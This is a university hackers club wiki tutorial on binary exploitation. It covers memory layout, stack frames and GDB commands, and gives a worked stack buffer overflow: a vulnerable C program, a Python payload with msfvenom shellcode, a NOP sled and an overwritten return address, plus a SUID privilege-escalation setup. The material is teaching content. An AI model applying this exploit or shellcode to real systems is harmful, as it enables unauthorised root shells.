Binary Exploitation

From HackThePlanet - Murdoch Hackers Club
Jump to: navigation, search

Why learn Binary exploitation techniques?

  • Can't prevent what you don't understand effectively when programming
  • Discover how programs really work

this information is provided for educational purposes only

Memory Layout and Purpose

Memory Layout.PNG

Kernel text and data

User Text

  • fixed by the program
  • contains instructions (code) to be executed
  • read-only data

User Data

  • contains initialised/uninitialised data
  • holds static variables
  • corresponds to data-bss section of an executable

Heap

  • Uses larger contiguous blocks of memory in general
  • e.g. malloc
  • grows towards larger memory addresses

Stack

  • Abstract data type
  • Last in first out propert when accessing(LIFO)
  • Contiguos block of memory containing data
  • Stores local variables
  • Focus for a stack based buffer overflow attack
  • Each function has it's own stack frame
  • grows towards lower memory addresses

Kernel virtual memory

Stack Information

Stack Control Mechanisms

  • push - add to the top of the stack and increases the Stack Pointer (SP) to reflect the new top of the stack
  • pop - remove from the top of the stack and decreases SP to reflect the new top of the stack

Stack frame example

This example will only work with protections disabled to compile your own code to test this method on using gcc the command would be "gcc <sourceCode> -o <newFileName> -fno-stack-protector –z execstack" with "sudo chmod u+s <program>" to escalate the program running permissions

Example code

void func(char * arg){
	char variable1 [4];
	strcpy(variable1, arg);
	int variable2 = 2;
	
}
This example code would create a stack frame that looks something like the top right image.
Example stack frame


If we were to place 4 bytes of information into variable1 such as 'AAAA' the program would operate as normal.
however, this example function does not check the buffer size during strcpy. We can abuse this and add more bytes which would begin to overwrite memory as shown in the middle-right image.
Overflowed stack frame
Given that we can now overwrite memory we can actually overwrite the whole stack frame. However, without a valid return address in the stack frame the program will produce a segmentation fault (segfault)
Using this new control over the stack we can modify the value used in the return call (ret) causing the program flow to be redirected to a place of our choosing (perhaps skipping variable assignments or security checks)


A classic privilege escalation attack (if the program has SUID set) is to overwrite the space with \x90 (also known as a nop being no-operation instruction) with custom instructions followed by a new return address pointing back into the stack. this achieves a shell with the programs SUID permissions. for this attack the stack frame would look something like the bottom right image (where nAdd is an address in the stack)

note when using shellcode for privilege escalation using SUID make sure to spawn /bin/sh NOT /bin/bash

Nop-sled and shellcode




Basic Disassembly

Key Registers

assuming 32 bit

  • EAX, EBX, ECX, EDX: General purpose registers
  • ESP - Stack pointer (points to the top of the stack)
  • EBP - Base pointer (points to the top of the stack frame)
  • EIP - Instruction pointer (location of next instruction to be performed)

note: the ret call in assembly is actually a POP EIP instruction

Common GDB commands

  • break <*instructionLocation>
sets a break point at the designated place to stop the program flow at that point
  • info register <registerName>
see what data is currently stored in a register
can shorten to "i r <registerName>"
can use just "i r" to show all register states
  • x/<formatSpecifier> <memoryAddress>
used to examine (x) the information at the location
common format specifiers (exampe: "x/100wx $esp-100" will show 100 words starting from ESP-100)
o - octal
h - hex
u - unsigned base 10 representation
s - string
T - binary
<number>wx - show <number> locations after the given address

Simple buffer overflow - source, payload, and execution

source code - saved as vuln

#include<stdio.h>
#include<string.h>
void win(){
	printf("\n ZOMG, 1337 h4x! \n");
}

void vuln (char * arg){
	char buf[256];
	strcpy(buf, arg);
}

int main(int argc, char **argv){
	printf("\nstring entered: %s\n",argv[1]);
	vuln(argv[1]);
} 

Example payload - saved as payload.py

#generated from msfvenom works on kali 32bit using previously mentioned commands
opcode =  "" 
opcode += "\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0b\xbf\x88"
opcode += "\x2d\x91\x4b\x31\x7e\x1a\x83\xee\xfc\x03\x7e\x16\xe2"
opcode += "\x7d\x47\x9a\x13\xe4\xca\xfa\xcb\x3b\x88\x8b\xeb\x2b"
opcode += "\x61\xff\x9b\xab\x15\xd0\x39\xc2\x8b\xa7\x5d\x46\xbc"
opcode += "\xb0\xa1\x66\x3c\xee\xc3\x0f\x52\xdf\x70\xa7\xaa\x48"
opcode += "\x24\xbe\x4a\xbb\x4a"

# "0xbfcd92c4“ – stack location as return address below found by examing stack after overflowing
returnaddress = "\xc4\x92\xcd\xbf"

#nop sled to sit before shellcode calculated to fill buffer
pad = (264 - len(opcode)) * "\x90"

#all together, nop sled + shellcode + new ret address in stack
sploit = pad + opcode + returnaddress

#print out the string to use as input for the program
print sploit

Example execution of a payload (shown below)

./vuln $(python payload.py)

Privilege escalation through a buffer overflow

Tools

debugging/disassembling

GDB: gnu debugger, good place to start
gdb-peda(python addon): Enhance the display of gdb: colorize and display disassembly codes, registers, memory information during debugging.
radare2: more advanced disassembler able to be scripted

other

msfelfscan: search binary for jump/ret instructions
msfvenom: generate shellcode


Further Learning Resources

Virtual Machines

Exploit excercises
Nebula: starting place for linux exploitation
Protostar: next progression from Nebula
Fusion: learn more about exploitation prevention systems
Vulnhub
SmashTheTux: contains readme files on different overflows with challenges

Course Materials

RPIsec - Modern Binary Exploitation (free)
Course content
Git hub repository: includes wargames and other materials

Readings

Hacking - the art of exploitation: goes through base hacking techniques starting with C and gdb.

Presentations/Slides

HackThePlanet - Murdoch University's Hackers Club
29/09/2016: Media:Basic_Memory_Structure_and_Binary_Exploitation.pptx